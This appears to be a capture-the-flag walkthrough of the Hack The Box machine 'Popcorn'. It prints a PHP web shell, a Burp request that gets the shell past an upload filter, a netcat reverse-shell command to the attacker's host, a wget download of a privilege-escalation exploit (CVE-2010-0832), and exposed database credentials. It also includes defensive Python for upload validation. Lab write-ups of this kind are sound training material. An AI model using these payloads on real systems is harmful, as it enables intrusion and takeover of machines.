Details
URL Hack The Box :: Popcorn
Difficulty Medium
User Solves U: 12850 ~ R: 11863
Release Date 15 Mar, 2017

Introduction

Released on 15 March 2017, Popcorn is one of the earliest challenges on the Hack The Box platform. As a medium-difficulty Linux machine, it’s well-suited for users ready to transition from beginner boxes to more advanced, skill-testing scenarios.

First Steps

The first step is a comprehensive enumeration scan to quickly identify open ports and gather detailed service information. I use the following command:

rs2nm 10.129.7.60 ./Loot

This runs RustScan for rapid port discovery, then hands off to Nmap for in-depth service enumeration. It also automatically triggers additional tools like enum4linux and others, helping build a solid information baseline right from the start. All results are neatly stored in the ./Loot directory.

Scan Output

🖥️ Host Info

  • Hostname: popcorn.hackthebox.gr
  • OS Detected: Linux
  • CPE: cpe:/o:linux:linux_kernel

🟢 Port 22 – SSH

  • Service: OpenSSH 5.1p1
  • OS & Distro: Ubuntu (based on version string Debian 6ubuntu2)
  • Protocol: SSH-2.0
  • Host Keys:
    • DSA (1024-bit): 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38
    • RSA (2048-bit): aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d

Note: OpenSSH 5.1 is very outdated and may contain known vulnerabilities, so it might be worth checking out.

🌐 Port 80 – HTTP

  • Service: Apache HTTPD 2.2.12
  • Title: No web page title was returned.
  • Header Info: Apache/2.2.12 (Ubuntu)

Web Enumeration - GoBuster Results

A directory brute-force scan was performed using the common.txt wordlist:

gobuster dir -u http://popcorn.htb -w /usr/share/wordlists/dirb/common.txt

===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 288]
/.hta                 (Status: 403) [Size: 283]
/.htaccess            (Status: 403) [Size: 288]
/cgi-bin/             (Status: 403) [Size: 287]
/index                (Status: 200) [Size: 177]
/index.html           (Status: 200) [Size: 177]
/test                 (Status: 200) [Size: 47361]
/torrent              (Status: 301) [Size: 312] [--> http://popcorn.htb/torrent/]
Progress: 4614 / 4615 (99.98%)

Exploring Discovered Directories

๐Ÿ“ /rename

Navigating to /rename reveals an API endpoint that provides the following usage hint: alt text

๐Ÿ” Observation:

  • Appears to be a PHP-based file renaming function. I did try testing with payloads to rename or move webroot files (e.g. renaming uploads to .php) but had no luck.

๐Ÿ“ /test

Accessing /test displays the output of phpinfo(), which includes: alt text

  • Full PHP version and configuration
  • Loaded modules and environment variables
  • Server paths and temporary directories
  • Script and document root

โš™๏ธ Gaining Initial Shell โ€“ Web Upload Exploitation

After registering an account on the Torrent Hoster application, I uploaded a benign .torrent file to test functionality. While searching for ways to rename this file into a .php shell using the /rename endpoint, I found that approach to be unfruitful.

🔄 Pivot to Metadata Upload

After uploading a torrent, the site allows the file to be edited, including adding an image (e.g., cover art or thumbnail). This opened a new attack vector: the image upload feature.

🧬 Web Shell Preparation

I created a simple PHP web shell:

<?php echo system($_GET['cmd']); ?>

However, when attempting to upload it directly, the site rejected it with an “invalid file type” error.


🧰 Bypassing the Filter via Burp Suite

To bypass the upload restriction, I intercepted the upload request in Burp Suite and modified the Content-Type to disguise the payload as a legitimate image.

๐Ÿ” Modified Upload Request:

alt text

------WebKitFormBoundaryBwEpXctqn6a0uNiv
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php echo system($_GET['cmd']); ?>

By changing:

Content-Type: application/x-php

to:

Content-Type: image/png

the file was successfully accepted and stored on the server.
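As an added, defensive illustration (this is not code from the box or from the Torrent Hoster application), the following Python models the upload check that the Burp edit above defeats, next to a hardened version that ignores the client's Content-Type and validates the extension and magic bytes instead. The multipart part is constructed from the modified request shown above; the allowed image types and the hashed storage name are assumptions.

```python
import hashlib
import re

# Image types the cover-art upload is meant to accept, keyed by extension
# (assumed allow-list; the real application's list is not on the page).
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Constructed sample: the multipart part from the modified Burp request.
SAMPLE_PART = (
    b'Content-Disposition: form-data; name="file"; filename="test.php"\r\n'
    b"Content-Type: image/png\r\n\r\n"
    b"<?php echo system($_GET['cmd']); ?>"
)
# Constructed sample: a (truncated) genuine PNG upload.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def parse_part(raw):
    """Split one multipart/form-data part into (filename, content_type, body)."""
    headers, _, body = raw.partition(b"\r\n\r\n")
    fn = re.search(rb'filename="([^"]*)"', headers)
    ct = re.search(rb"Content-Type:\s*([^\r\n]+)", headers)
    return (fn.group(1).decode() if fn else "",
            ct.group(1).decode().strip() if ct else "",
            body)

def weak_check(filename, content_type, body):
    """Trusts the client-supplied Content-Type, so editing one header defeats it."""
    return content_type.startswith("image/")

def hardened_check(filename, content_type, body):
    """Ignores Content-Type. Requires a single allow-listed extension (no double
    extensions such as x.php.png, which Apache can hand to mod_php) and a body
    whose magic bytes match that extension."""
    m = re.fullmatch(r"[A-Za-z0-9_-]+\.([A-Za-z0-9]+)", filename)
    if not m:
        return False
    ext = m.group(1).lower()
    return ext in ALLOWED and body.startswith(ALLOWED[ext])

def stored_name(filename, body):
    """Server-chosen storage name: content hash plus the validated extension,
    never the client's name. Returns None when validation fails."""
    if not hardened_check(filename, "", body):
        return None
    return hashlib.sha1(body).hexdigest() + "." + filename.rsplit(".", 1)[1].lower()
```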


๐Ÿ–ฅ๏ธ Execution

Once uploaded, I navigated to the file’s location which I found based on the missing image, and triggered commands using the cmd parameter:

alt text

http://popcorn.htb/torrent//upload/01e18dabb25f43c4cad3ded13ff7f49384bcc079.php?cmd=nc%2010.10.14.2%201337%20-e%20/bin/sh

alt text

This confirmed remote code execution as the www-data user, providing a foothold on the box.

alt text


๐Ÿ  Local Enumeration โ€“ /home Directory

After gaining a shell as www-data, I began basic post-exploitation enumeration. A quick check of the /home directory revealed a user folder:

ls -la /home

drwxr-xr-x 3 george george 4096 Oct 26 2023 george

⛳ Capturing the User Flag

Inside /home/george, I discovered the user.txt file:

-rw-r--r-- 1 george george     33 Apr 30 03:46 user.txt

It was world-readable, so I simply ran:

cat /home/george/user.txt

This confirmed a successful foothold on the system and access to user-level data.


๐Ÿ›ก๏ธ Privilege Escalation โ€“ MOTD PAM Exploit (CVE-2010-0832)

๐Ÿ” Enumeration with LinPEAS

After obtaining user access, I ran LinPEAS to gather local privilege escalation vectors. Key findings included:

  • ๐Ÿง Kernel Version:
    Linux 2.6.31-14-generic-pae โ€” old Ubuntu kernel from Ubuntu 9.10 (Karmic Koala)

  • ๐Ÿ“ Interesting Config Files:
    From /var/www/torrent/config.php:

    $CFG->dbUserName = "torrent";
    $CFG->dbPassword = "SuperSecret!!";
    

    These MySQL credentials were valid but didn't lead to anything directly exploitable.

  • 📄 MOTD Legal Disclosure Message Found:
    A reference to motd.legal-displayed hinted at an outdated MOTD (Message of the Day) mechanism, often linked with privilege escalation issues on older Ubuntu systems.


🔎 Exploit Research

Referencing these links: 🔗 Softpedia - Ubuntu Bug Allows Local Users to Gain Root and 🔗 ExploitDB, I searched ExploitDB:

searchsploit motd
----------------------------------------------------------------------------------
 Exploit Title
----------------------------------------------------------------------------------
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)         
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)           
MultiTheftAuto 0.5 patch 1 - Server Crash / MOTD Deletion                                    
----------------------------------------------------------------------------------
Shellcodes: No Results
Papers: No Results

🧪 Exploitation Process

  1. Downloaded the exploit to /tmp on the target machine:

    wget http://10.10.14.2/14339.sh
    chmod +x 14339.sh
    
  2. Executed the script:

    ./14339.sh
    
  3. The script:

    • Injected a malicious MOTD to escalate privileges
    • Set up temporary SSH key access
    • Removed traces after execution
  4. Prompted with:

    [+] Success! Use password toor to get root
    

๐Ÿง‘โ€๐Ÿ’ป Root Access Achieved

su - root
Password: toor

Confirmed root access:

root@popcorn:/tmp# ls ~/
root.txt

🎉 Root flag captured!